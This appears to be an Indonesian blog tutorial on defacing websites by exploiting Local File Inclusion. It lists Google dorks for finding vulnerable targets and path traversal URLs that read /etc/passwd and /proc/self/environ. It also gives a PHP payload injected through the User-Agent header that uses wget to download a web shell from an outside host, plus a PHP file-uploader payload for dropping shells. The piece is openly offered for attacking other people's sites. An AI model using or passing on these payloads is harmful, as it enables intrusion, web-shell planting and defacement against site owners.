Tutorial LFI – Cara Deface Website dengan Teknik Local File Inclusion

Tutorial LFI – Cara Deface Website dengan Teknik Local File Inclusion. Sebenernya ini exploit lama banget. Malah bisa dibilang basic kalo kalian pengen belajar pentest web. Setara sama SQLi lah . Tapi post aja biar isi blog nya lengkap, sebagai arsip pribadi juga hehe.
Langsung saja, disini yang dibutuhkan cuma Browser Mozilla dengan addons tamper data.

Google Dorks :

  • inurl:/view/lang/index.php?page=?page=
  • inurl:/shared/help.php?page=

Use your brain , b1tch !
Saya anggep sudah dapat site vuln nya.
Pertama, test basic apa web tersebut vuln LFI.

  • localhost/view.php?page=email.php

Coba ganti email.php dengan ../../

  • localhost/view.php?page=../../

Jika kalian dapat error seperti

Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337

Viola ! 😀 Ada kesempatan untuk membuka localfile yang lebih sensitif 😀
Kita coba panggil file /etc/passwd nya .

  • localhost/view.php?page=etc/passwd

Masih error ?

Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337

Kita coba naikkan direktori nya.

  • localhost/view.php?page=../../../../../etc/passwd

Kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya kebaca.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin

…. dsb :p

Sekarang kita coba panggil apakah proc/self/environ bisa diakses atau tidak. Karena disinilah proses inject backdoor akan dimulai.

  • localhost/view.php?page=../../../../../proc/self/environ
DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac
HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337
REQUEST_METHOD= GET REQUEST_URI = /view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php
SERVER_ADDR=1xx.1xx.1xx.6x [email protected] SERVER_NAME=localhost
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80

Berarti web tersebut bisa diinject. Kalau blank, berarti tidak bisa.
Langkah selanjutnya, aktifkan tamper data.
Load halaman localhost/view.php?page=../../../../../proc/self/environ
Lalu tamper.
pada user-agent di addons tamper data tadi isi dengan

<?system(‘wget http://yuyudhn1337.org/exp/cmdshell.txt -O fvck.php’);?>

Lalu submit.

Shell kalian akan terletak di

  • localhost/fvck.php

Pada beberapa kasus, fungsi system di server dimatikan sehingga kita tidak bisa melakukan wget melalui cara diatas.
Tapi ada cara lain.
Pad user-agent masukkan script uploader berikut :

<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>
<h1> shu </h1></p>
<br> <form action="" method="post" enctype="multipart/form-data">
Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>

Setelah diupload, maka shell akan terletak di root path domain.
Sekian tutor kali ini semoga bermanfaat.

Shares

Leave a Reply